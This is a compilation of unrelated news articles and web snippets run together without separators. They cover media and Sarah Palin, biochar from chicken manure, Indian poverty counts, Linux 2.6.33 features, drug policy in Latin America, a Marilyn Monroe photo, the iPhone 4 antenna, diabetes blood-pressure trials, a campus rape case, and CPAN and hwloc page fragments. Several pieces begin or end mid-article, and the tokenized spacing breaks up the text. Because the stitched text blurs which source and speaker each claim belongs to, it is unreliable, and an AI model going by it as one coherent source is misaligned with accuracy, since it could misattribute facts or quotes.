As more journalists vanish , who will tell the truth about the liars ?
Mitchell Bard , a writer , filmmaker , journalism academic and - as you will note - a political liberal , raises questions that haunt modern media .
To make his point he links two stories .
First , the false claim on Sarah Palin's Facebook page that her ethics issues in Alaska are " a sinister ' partisan ' conspiracy directed by Obama 's White House . "
Second , the reported axeing by ABC News of nearly 400 staff , about a quarter of its total staff .
Bard argues that " in a time of revolutionary upheaval in the way Americans get their news " , there is a worrying possibility that lies , such as Palin's , will not be revealed as such because too few journalists working for too few outlets will survive .
He writes :
With network news and newspapers struggling , the two pillars of traditional hard news are slowly disappearing from American lives .
Yes , many people now turn to the internet to get their news , but this raises two main concerns .
First , we are in a transitional era , in which the old media ( broadcast and print ) are supporting the free news content online .
That model can't last , and we have yet to see a financial model emerge that would allow news content to be funded in an online future .
Second , many online media sources ( like cable news outlets ) are partisan ( while we know HuffPo is an excellent source of fact - based news , its progressive instincts can be used against it .
Bard fears that when Palin or other right - wingers ( including Fox News presenters ) tell lies , the traditional mainstream media is not in a position to expose those lies .
Though pleased that HuffPo and other sites - such as Media Matters - do expose the right 's falsehoods , he writes :
There is a qualitative difference between challenges from progressive - oriented sources and the traditional mainstream objective media .
The fact that such media are dying allows the lies to gain traction in some quarters .
He talks about " the emergence of a right - wing media structure ( Fox News , conservative talk radio , etc. ) that constructs its own set of " facts " .
In this world , he writes , President Obama is a terrorist - loving Muslim socialist born in Kenya who seeks to have the government take over American businesses while stripping Americans of all of their freedoms .
How can you reasonably debate policy when there are two different sets of " facts " ?
Source : HuffPo
Enlarge By Jack Gruber , USA TODAY Josh Frye uses manure and a gasifier to heat the chicken house where he raises hatchlings .
The results : lower propane costs .
USA TODAY and CBS News team up to tackle issues facing the nation in the next 10 years .
The reports run during January in USA TODAY and for months on CBS News .
Full coverage .
WARDENSVILLE , W.Va . 
Here 's a low - cost solution to global warming : chicken manure .
At Josh Frye 's poultry farm in West Virginia , the chicken waste is fed into a large , experimental incinerating machine .
Out comes a charcoal - like substance known as " biochar " — which is not only an excellent fertilizer , but also helps keep carbon in the soil instead of letting it escape into the atmosphere , where it acts as a greenhouse gas .
Former vice president and environmental advocate Al Gore calls biochar " one of the most exciting new strategies " available to stop climate change .
For Frye , it means that , before long , " the chicken poop could be worth more than the chickens themselves . "
WHERE AMERICA STANDS : The U.S. in the next decade GREEN HOUSE : News and insight on the latest green topics SCIENCE FAIR : Science , space and discoveries " I thought it was crazy at first , and my wife still thinks it 's nuts , " admits Frye , 44 .
Yet he has sold nearly $ 1,000 worth of biochar to farmers as far away as New Jersey , and plans to sell much more as he refines production .
Venture capitalists , soil scientists and even members of Congress have all come to Frye 's farm to see whether his example can be repeated .
Techniques such as biochar may represent the best compromise between what 's good for the environment , and what 's affordable during the recession , says Rep. Shelley Moore Capito , R - W.Va. , who visited Frye 's farm in August .
As political support in Washington fades for more expensive pollution - fighting measures , such relatively cheap green technology may represent the immediate future of the environmental movement , analysts say .
The strategies range from the simple , such as putting carbon dioxide filters on top of smokestacks , to the controversial , such as a recent United Nations proposal to give out more free condoms — which would in turn slow population growth , leading to fewer greenhouse gas emissions that are causing the planet to warm , the U.N. says .
Taken together , a " portfolio " of low - cost initiatives could have a meaningful , positive impact on the environment , says Jae Edmonds , a prominent climate change scientist at the University of Maryland .
More ambitious plans have stalled recently , including " cap and trade " legislation in the Senate that would set a national limit on greenhouse gas emissions and force companies to buy and sell permits to emit carbon dioxide .
December 's 193- nation environmental summit in Copenhagen failed to produce a binding treaty to cut global pollution .
" You have to make do with what you 've got , " Edmonds says .
" If these other proposals are being deferred , then in the years ahead , we need to embrace these low - cost technologies that can get people excited ... because every little bit helps . "
Biochar is typical of the promise — and potential pratfalls — of such technologies .
Scientists are still trying to determine how much of an impact biochar can really make in reducing pollution .
In recent years , some promising ideas have either fallen short of expectations or had unintended negative consequences .
For example , the widespread use of corn ethanol as an additive to gasoline has caused U.S. food prices to rise sharply while reducing greenhouse gas emissions from vehicles by less than 1 % a year , according to a report published last year by the Congressional Budget Office .
Timothy LaSalle , CEO of the Rodale Institute , a Pennsylvania - based non-profit group that advocates organic farming , says recent research indicates that a widespread shift to organic farming and other changes in how rural land is managed would trap such a large amount of carbon in the ground that they essentially could cancel out all carbon emissions from man-made sources , such as power plants .
LaSalle 's predictions have bothered some scientists and environmental activists who accuse him of being too optimistic .
LaSalle says he recently received a phone call from one of Gore 's assistants challenging his findings .
( Kalee Kreider , a Gore spokeswoman , had no comment . )
" I understand that scientists need to be conservative , but what we need right now are the outliers and extreme innovators to step forward and help solve this problem , " LaSalle says .
" We 've got to clean up this atmosphere as fast as we can . "
Seeing dollar signs
As with many new green initiatives , Frye 's began with one main objective — money .
" I always thought , ' Would n't it be nice to burn all this manure and use the heat to warm the chicken houses ? ' " he recalls .
Frye 's farm produces up to 800,000 chickens a year , and hatchlings need to be kept at a steady temperature of about 90 degrees , resulting in about $ 30,000 a year in propane costs .
Research led Frye to an Illinois - based company , Coaltec Energy , which produces gasifiers for agricultural use .
To afford the machine 's approximately $ 1 million cost , Frye applied for grants and low - interest loans from the Natural Resources Conservation Service , a federal agency that aids soil and water protection efforts , plus the West Virginia Department of Agriculture and other state agencies .
The machine looks like something out of a Dr. Seuss book .
Ladders and tubes stick out from seemingly everywhere , and Frye has spent the past three years figuring out the best way to use it .
What makes the machine special is its ability to heat the manure in an extremely low - oxygen environment — a process that produces no smoke and no smell .
Some of the resulting heat is , in turn , funneled into one of Frye 's chicken houses , where it helps keep his hatchlings warm .
It 's the byproduct of the process — the biochar — that has environmentalists most excited , and has Frye seeing dollar signs .
Biochar can be produced from several sources including wood and switchgrass , and it was first used in agriculture several centuries ago by Amazon Indians .
Only recently have scientists begun to fully appreciate its impact on the environment , says Johannes Lehmann , a soil scientist at Cornell University .
Because biochar contains high levels of carbon , the element contained in all living things , it often serves as a very effective organic fertilizer , Lehmann says .
That , in turn , produces healthier plants which , through photosynthesis , suck more carbon dioxide out of the atmosphere .
Another aspect of biochar may be even more beneficial .
Under normal circumstances , the carbon in waste material — a leaf that falls to the forest floor , for example — decays naturally , releasing carbon dioxide into the atmosphere .
But Lehmann says the carbon in biochar is particularly resistant to that conversion , so it stays " locked into " the soil much longer than other , unprocessed substances — as long as 1,000 years in some cases .
" That 's the key , " Lehmann says .
" Through this process , you 're taking carbon dioxide out of the atmosphere . "
He says that even a relatively small - scale effort using such methods " could make a significant dent in emissions on a global level . "
How much of a ' gamble ' ?
Lehmann says he and other researchers are still exploring which kinds of material make the best biochar , and how effectively it works in certain soils .
He calls Frye a " front - runner " in poultry biochar , and says other producers may follow his example .
Meanwhile , Frye is working on increasing the carbon content of his biochar , which would make it more valuable .
He frequently mails samples to scientists for analysis .
When he wants to gauge the quality right away , he admits with a smile that he puts a little char in his mouth .
( " If it 's pasty and hard to swallow , then it 's impure , " Frye says . )
When Frye 's machine operates at full capacity , it churns out as much as 9,000 pounds of biochar per day .
Based on his contacts with businesses , Frye says he can sell high - quality biochar for $ 1 a pound .
" There 's big - time people ... looking at this , " he says .
That gold - rush mentality has given some people pause .
LaSalle , the organic farming advocate , fears biochar has become overhyped , cautioning " there is too much venture capital involved . "
Pat Mooney , director of ETC Group , a Canadian environmental organization , describes biochar as a " gamble . "
" It becomes an excuse for others to say : ' Hey , do n't worry , we do n't have to cut back on greenhouse gas emissions . '
And that 's just not true , " Mooney says .
Even Mike McGolden , president of the company that sold Frye his gasifier , is cautious .
He says Frye 's experimentation has paved the way for larger - scale producers , including a dairy farm and chicken egg - laying operations in the Chesapeake Bay area , to acquire similar technology .
He says it 's still unclear whether the technology will prove viable for other small - scale farmers .
Still , Moore Capito , the congresswoman , says she was " very excited " by Frye 's operation during her recent tour of homegrown green initiatives in her home state , which included solar and wind farms .
" In the long run , these things might take a little longer ( than cap and trade ) to produce positive results , but then again they might not .
We just do n't know , " Moore Capito says .
For Frye , it 's a win-win .
" This started as a way for me to make savings , " he says .
" But if it 's good for me , and it 's good for the planet too , hey , you sure can't beat that .
Guidelines :
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
Read more
LUCKNOW , India — Alimunisha's home is a 150 - square - foot mud floor with a roof of plastic tarp held up by bamboo sticks .
The beds are burlap potato sacks .
There 's no running water , electricity or toilet .
She can afford to feed her five children one meal a day on the income her husband earns selling traditional drums .
But according to the Indian government , Ms. Alimunisha , who goes by only one name , is n't living in poverty .
That means her family does n't qualify for aid aimed at the poorest Indians , including a program that provides free housing and subsidies that would cut her food costs by two - thirds .
India , one of the world 's fastest growing economies , is now embarking on a major reassessment of poverty levels .
The review will determine how many struggling people across the world 's second - most populous nation , from urban slum dwellers like Ms. Alimunisha to landless farm laborers , will be counted among the ranks of the official poor and get government handouts .
At a stroke , tens of millions of people could flood onto the welfare rolls .
Generating a reliable list of poor households has become a top priority for the government of Prime Minister Manmohan Singh , which has pledged to spread the benefits of India 's rapid growth to the aam aadmi , or common man .
The government launched its review of poverty as it drafts legislation to give the poorest Indians a right to subsidized food - grains .
Interesting features for embedded Linux system developers
Linux 2.6.33 was out on Feb. 24 , 2010 , and to incite you to try this new kernel in your embedded Linux products , here are features you could be interested in .
The first news is the availability of the LZO algorithm for kernel and initramfs compression .
Linux 2.6.30 already introduced LZMA and BZIP2 compression options , which could significantly reduce the size of the kernel and initramfs images , but at the cost of much increased decompression time .
LZO compression is a nice alternative .
Though its compression rate is not as good as that of ZLIB ( 10 to 15 % larger files ) , decompression time is much faster than with other algorithms .
See our benchmarks .
We reduced boot time by 200 ms on our at91 arm system , and the savings could even increase with bigger kernels .
This feature was implemented by my colleague Albin Tonnerre .
It is currently available on x86 and arm ( commit , commit , commit , commit ) , and according to Russell King , the arm maintainer , it should become the default compression option on this platform .
This compressor can also be used on mips , thanks to Wu Zhangjin ( commit ) .
For systems lacking RAM resources , a new useful feature is Compcache , which allows to swap application memory to a compressed cache in RAM .
In practise , this technique increases the amount of RAM that applications can use .
This could allow your embedded system or your netbook to run applications or environments it could n’t execute before .
This technique can also be a worthy alternative to on - disk swap in servers or desktops which do need a swap partition , as access performance is much improved .
See this LWN . net article for details .
This new kernel also carries lots of improvements on embedded platforms , especially on the popular TI OMAP platform .
In particular , we noticed early support to the IGEPv2 board , a very attractive platform based on the TI OMAP 3530 processor , much better than the Beagle Board for a very similar price .
We have started to use it in customer projects , and we hope to contribute to its full support in the mainline kernel .
Another interesting feature of Linux 2.6.33 is the improvements in the capabilities of the perf tool .
In particular , perf probe allows to insert Kprobes probes through the command line .
Instead of SystemTap , which relied on kernel modules , perf probe now relies on a sysfs interface to pass probes to the kernel .
This means that you no longer need a compiler and kernel headers to produce your probes .
This made it difficult to port SystemTap to embedded platforms .
The arm architecture does n’t have performance counters in the mainline kernel yet ( other architectures do ) , but patches are available .
This carries the promise to be able to use probe tools like SystemTap at last on embedded architectures , all the more if SystemTap gets ported to this new infrastructure .
Other noticeable improvements in this release are the ability to mount ext3 and ext2 filesystems with just an ext4 driver , a lightweight RCU implementation , as well as the ability to change the default blinking cursor that is shown at boot time .
Unfortunately , each kernel release does n’t only carry good news .
Android patches got dropped from this release , because of a lack of interest from Google to maintain them .
These are sad news and a threat for Android users who may end up without the ability to use newer kernel features and releases .
Let ’s hope that Google will once more realize the value of converging with the mainline Linux community .
I hope that key contributors that this company employs ( Andrew Morton in particular ) will help to solve this issue .
As usual , this was just a selection .
You will probably find many other interesting features on the Linux Changes page for Linux 2.6.33 .
BOGOTA , Colombia — “ Drugs win drug war . ”
That was the prescient headline of a 1998 dispatch in The Onion .
“ Despite all our efforts , ” the satirical newspaper reported , “ the U.S. government has proven no match for the awesome power of the illegal high . ”
Funny stuff .
But a dozen years later , serious news outlets are writing pretty much the same story .
“ After 40 years , ” the Associated Press reported this month , “ the United States ' war on drugs has cost $ 1 trillion and hundreds of thousands of lives , and for what ?
Drug use is rampant and violence even more brutal and widespread . ”
As a correspondent in South America , I cover the upstream end of the illegal drug business , the waste and failure of which has seemed to make no difference to policymakers in Washington .
It ’s not that drug - war skeptics have some magic formula .
But for a long time , U.S. lawmakers shied away from even considering alternatives to our zero - tolerance militaristic approach for fear of being labeled soft on drugs and losing the next election .
That ’s why it ’s been fascinating to watch drug - law reforms bubble up from cash - strapped state governments in the U.S .
And though changes to our approach overseas have been slower to materialize , the Obama administration — which announced its new drug control strategy this month — is making a few moves in the right direction in places like Colombia and Afghanistan .
“ For once we have the wind at our backs instead of in our faces , ” said Bill Piper of the New York - based Drug Policy Alliance , the leading organization in the United States promoting alternatives to the war on drugs .
“ More people are talking about alternatives and saying in public what they thought in private . ”
Many of the domestic initiatives are practical moves to deal with budget deficits and prisons overcrowded with non-violent drug offenders .
Californians , for example , will vote in November on a referendum on whether to legalize marijuana for casual users , a policy that some studies suggest could bring in more than $ 1.4 billion in annual tax revenue .
New Jersey recently became the 14th state to approve the use of marijuana for medical purposes , a move that the District of Columbia may follow .
If so , we could have medical marijuana dispensaries in the nation ’s capital sometime next year .
States are getting rid of mandatory minimum sentences for drug offenders .
And several top - notch universities , including Harvard , are experimenting with hallucinogens as possible treatments for cancer , post - traumatic stress and depression .
But will these sensible changes at home translate into more effective U.S. policies abroad ?
Skeptics point out that two - thirds of Obama ’s $ 15 billion annual drug - control budget is dedicated to interdiction and law enforcement even though many studies show that programs to prevent and treat drug abuse are far more cost effective .
Washington has also poured huge sums into forcibly eradicating plots of coca and opium , the raw materials for cocaine and heroin .
But peasant farmers often press deeper into the wilderness to grow more drugs .
And around the world , heroin and cocaine remain relatively cheap , potent and widely available .
Last year , Richard Holbrooke , Obama ’s special envoy to Afghanistan , finally acknowledged the obvious .
He put a stop to U.S. - supported programs to eradicate opium poppies in that country , saying the effort was turning local communities that depend on drug profits against the U.S. - backed Afghan government .
“ Eradication is a waste of money , ” Holbrooke said .
“ It might destroy some acreage , but it did n't reduce the amount of money the Taliban got by one dollar .
It just helped the Taliban .
So we 're going to phase out eradication . "
Instead , there will be a greater U.S. focus on fighting high - level traffickers and promoting legal economic activities in Afghanistan , the source of 93 percent of the world ’s heroin .
In Colombia , Washington is sharply drawing down the budget for forced eradication of coca and opium , though the idea is for the Colombian government to take over some of those chores .
Yet both governments have endorsed a more “ holistic ” approach .
In former guerrilla and drug - trafficking strongholds where the Colombian government is trying to win over the civilian population , eradication is being closely coordinated with efforts to set up police stations , build roads and schools and provide alternative sources of employment for farmers trying to leave the drug business .
Then , there ’s Mexico where the ferocious violence seems like a flashback to Colombia in the 1980s and 1990s .
Washington is providing the Mexican government with $ 1.4 billion in equipment and police training to target drug gangs .
But since President Felipe Calderon took office in December 2006 , Mexico has registered nearly 23,000 drug - related killings .
Both governments seem at a loss over what to do next which means that , for now , they ’ll likely stay the course .
Yet there have been some rhetorical shifts from U.S. officials .
Secretary of State Clinton and others have acknowledged American responsibility for domestic drug consumption and for the flow of assault weapons and drug profits to bad guys south of the border .
There ’s also a growing recognition that Mexico will likely get nowhere unless the government cleans up its corrupt law enforcement agencies .
“ There ’s a realization that the drug war has n’t accomplished what had been hoped for , ” said John Walsh of the Washington Office on Latin America think tank .
“ We are seeing some new attitudes but this has n’t always translated into new policies . ”
After years of floundering , however , even small policy changes should be cheered .
And as for what to do in Mexico , policymakers can always turn to The Onion for inspiration .
One of its latest dispatches from the drug war was headlined : “ DEA hires Lil Wayne to use up all drugs in Mexico . ”
John Otis covers Colombia for GlobalPost .
He is the author of a new book " Law of the Jungle : The Hunt for Colombian Guerrillas , American Hostages , and Buried Treasure . "
Los Angeles , California ( CNN ) -- Marilyn Monroe 's sultry rendition of " Happy Birthday " sung for President John F. Kennedy 's 45th birthday celebration marked the actress ' last major public appearance before her mysterious death in August 1962 .
Tuesday , which would have been Monroe 's 84th birthday , marked the public debut of a rare image of Monroe with Kennedy and his brother Robert F. Kennedy together after the May 19 , 1962 , party .
The black - and - white photo , taken by White House photographer Cecil Stoughton , showed Monroe still wearing the infamously tight - fighting , sheer rhinestone - studded dress she wore when singing earlier at Madison Square Garden .
President Kennedy appears to be turning away from the camera , something he rarely did , while his brother , the U.S. attorney general , looks toward them .
" There is no other known photo of Bobby [ Kennedy ] with Marilyn or JFK with Marilyn , and it's not because they were never photographed together , " said filmmaker Keya Morgan , who now owns the only original prints of it .
" In fact , they were photographed together many times , but the Secret Service and the FBI confiscated every single photograph . "
Stoughton , who sold the prints to Morgan a year before his death in 2008 , told him agents missed one negative in their search , he said .
" The Secret Service came in when he was developing the negatives and basically confiscated all the ones of Jack , Bobby with Marilyn , " Morgan said .
" The only one that survived is the one that was in the dryer . "
Historian Arthur Schlesinger Jr. , who was an aide to President Kennedy , appears in the photo holding a drink and cigar and wearing a broad smile .
Schlesinger 's personal journal , published in 2007 , included his impression of Monroe at the private gathering .
" The image of this exquisite , beguiling and desperate girl will always stay with me , " Schlesinger wrote .
" I do not think I have seen anyone so beautiful ; I was enchanted by her manner and her wit , at once so masked , so ingenuous and so penetrating . "
He wrote that Robert Kennedy was paying great attention to Monroe at the gathering , which was at the Manhattan home of Arthur and Matilda Krim .
" Bobby and I engaged in mock competition for her ; she was most agreeable to him and pleasant to me , but one never felt her to be wholly engaged , " Schlesinger wrote in a passage included in his book " Journals : 1952 -2000 . "
While the relationship between the Kennedy brothers and Monroe has become a documented part of history , photographer Stoughton was reluctant to allow the image to become public until after former first lady Jacqueline Kennedy 's death in 1994 .
Morgan said he bought access to the negative while working on an upcoming documentary about the actress 's death , " Marilyn Monroe : Murder on Fifth Helena Drive . "
Stoughton , in interviews for the film , told Morgan the story behind the first lady 's refusal to attend her husband 's birthday gala .
" He 's the one who told Jackie that Marilyn was going to be at the celebration , and her exact words were ' Screw Jack , ' and she left the room and she did not go to the famous celebration , " Morgan said .
Morgan 's prints show details not clear in low - resolution , cropped copies that made their way onto the internet after the photo was licensed for a book about Monroe in 2004 .
Singer Harry Belafonte is seen in the background with his wife , talking to a man that Stoughton told Morgan was comedian Jack Benny .
Beverly Hills art appraiser David W. Streets , who reviewed the prints and their history for CNN , called them " the real McCoy . "
" This is a very significant piece of American and celebrity history , of fine art photography , " Streets said .
Since Stoughton was a U.S. Army captain and was using a government - owned camera and film , the images themselves are in the public domain .
But access to the negative , which Stoughton secretly kept , was valuable , Streets said .
Stoughton made and signed 10 prints for Morgan , 30 inches by 30 inches .
Nine of them go on sale Tuesday at the Art & Artifact Gallery in West Hollywood , California .
The 10th print was given to singer Michael Jackson two years ago , Morgan said .
Morgan was a friend of the pop star's , who was a big Monroe fan .
Photo by Steve Golson
I hit a nerve on Friday .
The iPhone 4 antenna controversy was way bigger than I realized .
The traffic to this site was incredible , and the extent of the blogs and news sites that picked up my comments was humbling .
I also did four telephone interviews , including the Wall Street Journal - they asked for photos , so we had some fun .
And yes , I did call it the " Vulcan iPhone Pinch " .
And no , Leonard Nimoy has not called .
I received many emails , too .
The overwhelming tone of the email was very friendly ; I wish I could respond to all of them immediately , but I am afraid that will have to wait .
I will try to touch on the topics raised in some of the emails in this blog entry .
First off , I still do n't have my iPhone 4 yet .
Sigh .
I am waiting patiently , so keep in mind that all my comments are based upon my experience with designing embedded antennas , and not with the specific antennas in question .
I promise to post my first - hand experiences here once mine arrives .
Also , I do n't have any Apple - specific information that you do n't have access to .
I am not a consultant to Apple , and have never been ; I do n't even play one on TV .
I do n't have an axe to grind .
Nor an iPhone 4 to play with .
But , I digress ...
I have seen mention of the electrical tape fix , the scotch tape fix , the bumper case fix , even the short - the - other slot fix on various web sites .
The important thing to realize is that we are dealing with radio frequency ( RF ) currents in the antenna , not direct current ( DC ) as you will find in a flashlight , for example .
If you place a thin insulator ( tape ) across the " gap " and over the " band " on the iPhone 4 , I would not expect that to make a very big difference .
With such a thin insulator you are effectively preventing a short at DC ( zero Hertz ) , but at the RF frequencies involved ( around 1GHz , or one billion Hertz ) you are just making a large capacitor .
A capacitor is fundamentally two conducting plates separated by an insulator .
When the capacitance is high enough ( plates big , insulator thin ) at the frequencies in question , it looks just like a short circuit .
So , I would not expect tape to create any improvement when the Grip Of Death is used ( see photo ) .
When I was on the phone with the WSJ , I explained the two distinct effects that holding the phone over the antennas will impart : detuning and attenuation .
Detuning can be understood by imagining a wine glass that is empty .
If we tap the glass with a fork , the glass will ring , or resonate , at some frequency .
If we put some wine in it ( or apple cider , since I do n't imbibe ) the resonant frequency will change and in this case increase .
This is the same for antennas .
Antennas are generally resonant at their frequencies of operation , and when we put our hand over them we " load " them with the dielectric of our bag of salty water .
This lowers the resonant frequency of the antenna and may make it harder to squirt energy into it at the frequency we want .
If the antenna is particularly narrow - band , it may " kill " it completely .
Generally , physically small ( compared to a wavelength ) antennas are narrow - band and large antennas may be wide - band .
This is why detuning is the first detrimental effect of putting your hand on an antenna .
Any antenna .
The second effect is attenuation , or loss .
Your hand is a dielectric , meaning it concentrates electric fields more than air .
This factor is called the dielectric constant , and for your hand is pretty high , like 12 or 20 or so .
It depends on your diet and BMI , so it 's kind of personal and I do n't want to make anyone uncomfortable by dwelling on it ; the important thing is to be healthy .
Oh ... right .... so this is what detunes the antenna .
But , your hand is also conductive , but not perfectly so .
So you WILL get a shock if you stick your thumb in a light socket , and I do n't recommend it .
This not - so - perfect conductor is what we call " lossy " .
RF energy impinging upon your hand ( or head ) is partially going to be turned into heat .
This is the SAR we were talking about , and you may have heard of .
This leads to an attenuation ( reduction ) in the signal being radiated into space by the antenna .
This is the other bad thing that happens to hand - wrapped antennas .
Once turned to heat , the RF energy is gone .
Just ask your dinner in the microwave .
So , detuning causes problems with squeezing energy from the circuitry into the antenna ( or vice versa ) , and attenuation causes problems with losing energy to heat .
The so - called bumper case is a much thicker insulator ( or dielectric ) than a piece of tape .
It pushes the lossy dielectric ( your hand ) further away , significantly reducing the capacitance .
I would expect this to reduce the detuning effect , but not the attenuating effect .
Will it help ?
You betcha ' .
However , it is a tradeoff : pushing a very high dielectric constant but lossy material away , and substituting it with a lower dielectric constant material .
If I were a betting man , I would guess that the dielectric constant of the materials used is about 3.3 .
So , it still will load the antenna , but not as much ; and it is entirely possible that this was taken into consideration in the design of the antenna .
Since I have had a case on my Primordial iPhone since it was new , I expect to do the same with the iPhone 4 .
When it gets here .
Any time now .
Now I want to rant a bit about the " experimental method " people have been using .
The iPhone 4 was out for roughly 24 hours before people were publishing the results of " tests " proving that it had inferior performance .
At my company , when I get to hook my fancy laboratory gear up to my client 's equipment in very controlled circumstances I can't do it that fast .
Folks , there are a couple of reasons that you need to give this product some time before jumping to conclusions .
First , we have no earthly idea what those little bars in the upper left corner of our screen really represent , yet we are staring at them like they 're going to help us find out what those damn numbers on LOST meant .
Steve Gibson of Gibson Research ( grc.com ) did a great piece on the meaning of the signal bars ; I am a huge fan of his , and his measured approach to technical challenges are worthy of our respect .
We do n't know what the bars mean , beyond more is better and less is ... less better .
We also do n't have a handle on the time constant of the bars , which is to say we do n't know when the bars change with respect to when the signal changes .
And worse , we do n't know if it 's consistent .
After all , it 's controlled by software .
Secondly , the cellular system is composed of many cell sites .
While you are making observations , you have no idea whether your iPhone is staying on one cell site , or switching between several .
This will completely obfuscate any measurements , even if you decided that the bars are useful .
In the good old days , when cell phones worked on steam , there was usually a service screen you can hack your way to which would show which site you 're on , and how strong it was in real engineering terms ( dBm ) .
I have never seen that capability on the iPhone ( but , I did n't look too hard ) .
Such a capability would be hugely helpful in our experiments .
So , how do we evaluate the performance with these limitations ?
The answer is : over more time , in more situations .
You need to observe more bars in more places .
( I know , cheap shot . )
Give it a couple of weeks .
Use it like you used your last phone .
If it does n't make you happy , return it to Apple .
But , give it a chance , and 24 hours ai n't it .
Several reporters wrote that I " blame the FCC for the iPhone antenna problems . "
Well , I did say " it 's the FCC 's fault " , but I was a bit glib .
It 's the whole process that drives the design ( I did say that , too ) , and part of that process is the tests the phones must pass .
And the FCC could care less whether your phone drops your calls in the middle of a conversation or not ; they care about protecting the " spectrum " and safety .
AT&T does care about efficiency , but they assume your hand is made of styrofoam .
Apple cares about striking a balance between product coolness ( you 'll buy it ) and product efficacy ( you 'll keep it ) .
All of these pressures lead a product to the end point .
And then the unpredictable takes over anyway , so enjoy the ride .
So , why did n't Apple do it differently ?
That 's a question I thought about through several showers .
I have finally boiled it down to one thing : any performance improvement would have made the iPhone 4 bigger .
Period .
Apple is putting ten pounds of stuff in a five - pound bag .
Put air space around the antenna to make it less sensitive to the presence of the human hand ?
Fuggetaboutit .
Air does n't sell phones .
Gyroscopes , accelerometers , high resolution screens , multiple cellular carrier capability ( did I say that ? ) , and big batteries .... that 's what the people want .
You just gotta hold it like this .
It seemed logical to look at the other risk factors .
One large federal study asked if getting high blood pressure down to a level considered normal , a systolic pressure of no more than 120 , would help protect diabetics from heart disease and save lives .
This hypothesis was promising because studies that observed populations found that heart disease and stroke risk increase continuously as systolic blood pressure rises from 115 on up , said Dr. William C. Cushman , a study investigator and chief of the preventive medicine section at the Veterans Affairs Medical Center in Memphis .
To put the idea of a normal blood pressure to the test , half of the study ’s 4,773 participants took drugs to get their systolic blood pressure to 120 or below .
The rest had a blood pressure goal of less than 140 .
But lower blood pressure did not prevent heart attacks or cardiovascular deaths , and those with lower blood pressure were more likely to suffer severe side effects from the drugs , like high potassium levels or dangerously low blood pressures .
They also took an average of 3.4 drugs to lower blood pressure , compared with an average of 2 drugs for those with the higher pressure .
A second , less rigorous study , involving 6,400 patients with Type 2 diabetes and heart disease , asked whether getting systolic blood pressure lower than 130 was any better than getting it to 130 to 140 .
It found that patients actually were worse off : those with the lower blood pressure ended up with a 50 percent greater risk of strokes , heart attacks or deaths .
National blood pressure treatment guidelines call for a systolic pressure of 130 or lower .
That was based on expert opinion and observational studies , Dr. Cushman said .
Now , he said , it is likely to be reconsidered when the group that sets the guidelines prepares a report this year .
People with diabetes also tend to have low levels of HDL cholesterol and high levels of triglycerides , a combination known to increase the risk of heart disease .
And in some studies , treating that combination with a type of drug called a fibrate reduced risk in diabetics and nondiabetics who were not taking statins .
So it made sense to see if fibrates also helped Type 2 diabetics who were taking statins .
Yesterday the Columbia Missourian ( staffed by students at the Missouri School of Journalism ) published a really excellent , extremely sad , piece on a student who just graduated , but was forced to spend her senior year reeling in the aftermath of rape .
According to the piece , ( which is triggering , as may be the rest of this post ) , the student , " J , " woke up with a condom wrapper on her pillow and no memory of the night before .
After an exam at the hospital , it became clear that she had been raped .
J's story highlights a number of routine struggles for rape victims .
For one thing , there is the issue of not knowing how and where to get the proper care .
Although the hospital gave J Plan B and antibiotics ( although sadly , she was not informed by anyone what the pills she was given actually were , she had to ask herself ) , she had to find HIV post - exposure prophylaxis on her own :
Over the weekend , a friend told her about drugs that prevent HIV .
To track them down , she called what felt like every health care facility in Columbia : University Hospital , Boone Hospital Center , the Regional AIDS Interfaith Network , MU's Student Health Center and others .
She told her story over and over .
Someone at the emergency room of Boone Hospital Center sent her back to University Hospital .
A University Hospital doctor suggested she get the drugs from the Columbia / Boone County Department of Public Health and Human Services .
Advertisement
For us at SAFER , this directly speaks to the need for university health centers / sexual assault crisis centers to at least have this information easily accessible to students , if they can 't / wo n't provide the drugs themselves .
But it 's clearly problem that is larger than the university system , which is equally frustrating .
J's story takes place entirely outside of the university system , in fact , since she did n't know who the perpetrator was , so she could not make a complaint to the school about another student .
She chose to go forward with a police investigation , and has found this to be a slow process :
Public Information Officer Jessie Haden said in an interview that detective work moves slowly even in the simplest of cases …
An ideal workload would be about 25 cases , and some Columbia police detectives have twice that , Haden said .
… Three months after the rape , police did n't know who it was .
The next step is to wait for DNA test results .
Because of a backlog at the Missouri State Highway Patrol center that processes DNA , those results probably wo n't be available for about six months .
Advertisement
To be honest , I have a really hard time knowing how to frame stories like this .
It 's hard to balance the fact that , as Haden said , " J.'s experience , though frustrating , is normal , " with not wanting to discourage people from reporting sexual assaults .
We know that reporting is important : not only is it important on a cultural scale ( breaking the silence about rape , having a better understanding of actual numbers ) , on an individual level it is a predictor of post - assault care , treatment , and healing .
I 've been writing on this blog for …I guess a couple of years now ?
Maybe less … but it 's something I still have n't worked out .
I 'm not a service or law enforcement professional , I can only go by what I read , so I do n't have special encouraging insight .
Maybe the key is to push the benefits of reporting without promising too much from the criminal justice system , but it 's so tragic to me that I have to think about this " balance " at all .
I would assume that if we took sexual violence more seriously , there would be more resources spent on processing crime data ( or it would be tested in the first place ) , and justice would come quicker for some people .
One last thing I want to point out is J's struggles with local media coverage of the rape .
Although I 'm assuming J's identity was kept anonymous , she was still extremely bothered by how stories over - exaggerated and misrepresented how much she had been drinking ( the article has a really interesting breakdown on how the media accesses police reports , which is worth a whole other post , really - read the original ! ) and disclosed information that she felt compromised her case .
It 's another issue that I should and would like to know more about - journalistic ethics and sexual assault cases .
For the moment , I will say that I was very pleased with the Missourian 's coverage , especially the fact that they ran a lengthy sidebar with information on what HIV prophylaxis is and how it works ; information about date - rape drugs , and contact information for university crisis centers and counselling .
But of course , I hope that all MU students would know that information before reading this article …
Advertisement
Students Active for Ending Rape ( SAFER ) works with college students to change the way their schools prevent and respond to sexual violence on campus .
This post originally appeared on the site Safer Campus .
Republished with permission .
Advertisement
Want to see your work here ?
Email us at submissions@jezebel.com .
× Module Install Instructions
To install Games :: FrozenBubble :: Symbols , simply copy and paste either of the commands in to your terminal
cpanm
cpanm Games :: FrozenBubble :: Symbols
CPAN shell
perl - MCPAN -e shell install Games :: FrozenBubble :: Symbols
For more information on module installation please visit the detailed CPAN module installation guide .
hwloc 2.3.0
Major release
> Read more Upgrading to v2.0 API
Guide for Porting your Code
> Read more XML topology database
Repository of XML topologies
> Read more The Best of lstopo
Best lstopo graphical outputs
> Read more
